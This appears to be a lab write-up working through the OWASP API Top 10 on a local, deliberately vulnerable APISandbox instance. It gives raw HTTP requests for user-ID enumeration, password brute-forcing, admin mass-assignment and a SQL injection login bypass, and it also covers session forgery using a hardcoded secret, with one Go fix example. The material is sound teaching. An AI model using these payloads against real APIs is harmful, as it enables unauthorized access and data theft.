OWASP API Top 10 Lab

wahaha, 2025-08-18. Source: SecHub Network Security Community



Setup

Download the project

wget https://github.com/API-Security/APISandbox/archive/refs/heads/main.zip -O APISandbox-main.zip
unzip APISandbox-main.zip
cd APISandbox-main

Enter the directory of one vulnerability/environment

cd OWASPApiTop10
cd docker

Build the environment automatically

docker-compose build

Start the whole environment

docker-compose up -d

Lab testing

API disclosure

Visiting the home page redirects to the swagger-ui interface, which discloses all of the APIs.

http://127.0.0.1:58084/swagger/
![](https://secevery.oss-cn-beijing.aliyuncs.com/images/article/2024/12/20/1734666241519.png?x-oss-process=style/ImageWaterMark_V1.0)

API1: Broken object level authorization

Do API4 first: log in by brute-forcing the password.

Once a user is logged in, the /v2/user/getuserinfo/:id API endpoint can be used to enumerate user information by iterating the id.

GET /v2/user/getuserinfo/2 HTTP/1.1
Host: 127.0.0.1:58084
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: GOSESSID=MTcwNTExNzIxMnxOd3dBTkVSWFUxSkRRMVZWU2xkYVJrSlhURTR6UmtWWU5scElSVWsyVEZaT1FrOVhRME5TVlZGSFdGTlhUamRKTmxGUFRFUlJTa0U9fHJ-pBjVpxvulVqrYh2lB8bmBaHfq4d_obryATJpZmm1
Connection: close
![](https://secevery.oss-cn-beijing.aliyuncs.com/images/article/2024/12/20/1734666353779.png?x-oss-process=style/ImageWaterMark_V1.0)
API2: Broken authentication
SecretKey: 0waspApiTop10

The secret is not a random value; once it leaks, the session can be forged locally, allowing login as any user.

Once the secret is known, gin sessions can be forged at will.

This can be chained with API7, which leaks the source code.

API3: Excessive data exposure

Once a user is logged in, /v2/user/getuseremail returns the email information of all users, while the web front end only uses the email belonging to the current user ID: excessive data exposure.

GET /v2/user/getuseremail HTTP/1.1
Host: 127.0.0.1:58084
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: GOSESSID=MTcwNTExNzIxMnxOd3dBTkVSWFUxSkRRMVZWU2xkYVJrSlhURTR6UmtWWU5scElSVWsyVEZaT1FrOVhRME5TVlZGSFdGTlhUamRKTmxGUFRFUlJTa0U9fHJ-pBjVpxvulVqrYh2lB8bmBaHfq4d_obryATJpZmm1
Connection: close

API4: Lack of resources and rate limiting

/v2/login can be brute-forced to recover the admin password (123qweasd); the API endpoint does not rate-limit requests.

POST /v2/login HTTP/1.1
Host: 127.0.0.1:58084
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 42

{"username": "admin","password": "123456"}

API5: Broken function level authorization

/v2/user/getuserprofile returns all of the current user's own information.

Without identifying any user, /v2/user/getuserprofiles returns every user's information.

GET /v2/user/getuserprofile HTTP/1.1
Host: 127.0.0.1:58084
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: GOSESSID=MTcwNTExNzIxMnxOd3dBTkVSWFUxSkRRMVZWU2xkYVJrSlhURTR6UmtWWU5scElSVWsyVEZaT1FrOVhRME5TVlZGSFdGTlhUamRKTmxGUFRFUlJTa0U9fHJ-pBjVpxvulVqrYh2lB8bmBaHfq4d_obryATJpZmm1
Connection: close

API6: Mass assignment

/v2/register

The front-end request has a hidden admin field that can be added by hand; with admin set to true, the new account is registered with administrator privileges.

POST /v2/register HTTP/1.1
Host: 127.0.0.1:58084
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 80

{"username": "test","password": "test","email": "test@test.com","admin": "true"}
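The mass-assignment bug above and its fix, as an added example in Go (not the sandbox's own code): a hypothetical account model is bound straight from the lab's /v2/register body in the vulnerable version, while the hardened version binds an allow-list request type and rejects the unknown admin key. The struct names and the ",string" tag (which makes Go accept the quoted "true" the lab request sends) are assumptions.

```go
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
)

// User is a hypothetical model of the lab's /v2/register body; ",string" accepts the quoted "true".
type User struct {
	Username string `json:"username"`
	Password string `json:"password"`
	Email    string `json:"email"`
	Admin    bool   `json:"admin,string"`
}

// registerVulnerable binds the body straight into the model: a client "admin" key becomes a privilege.
func registerVulnerable(body []byte) (User, error) {
	var u User
	err := json.Unmarshal(body, &u)
	return u, err
}

// registerRequest is the allow-list of fields a client may set when registering.
type registerRequest struct {
	Username string `json:"username"`
	Password string `json:"password"`
	Email    string `json:"email"`
}

// registerSafe binds only allow-listed fields and rejects unknown keys such as
// "admin" outright, so a mass-assignment probe fails loudly and can be logged.
func registerSafe(body []byte) (User, error) {
	dec := json.NewDecoder(bytes.NewReader(body))
	dec.DisallowUnknownFields()
	var req registerRequest
	if err := dec.Decode(&req); err != nil {
		return User{}, fmt.Errorf("registration rejected: %w", err)
	}
	// Admin stays false: it is set by server-side policy, never from the body.
	return User{Username: req.Username, Password: req.Password, Email: req.Email}, nil
}

func main() {
	// Constructed body, identical to the lab's mass-assignment request.
	body := []byte(`{"username": "test","password": "test","email": "test@test.com","admin": "true"}`)
	u, _ := registerVulnerable(body)
	_, err := registerSafe(body)
	fmt.Println("vulnerable binding granted admin:", u.Admin, "| hardened:", err)
}
```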

API7: Security misconfiguration

/static

The static directory was configured one level too high (the parent directory), so the source code or the binary can be downloaded.

API8: Injection

/v2/login has a SQLite injection that yields usernames and passwords.

POST /v2/login HTTP/1.1
Host: 127.0.0.1:58084
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:58084/swagger/
Connection: close
Content-Length: 57

{
"username":"-1' or 1=1 --",
"password":"123qweasd"
}

API9: Improper assets management

/v2/getenv: access forbidden

/v1/getenv: accessible

Because a legacy API endpoint left over from development was never retired, the old API version still exposes the environment variables.

API10: Insufficient logging and monitoring

There is no logging, so no information is recorded.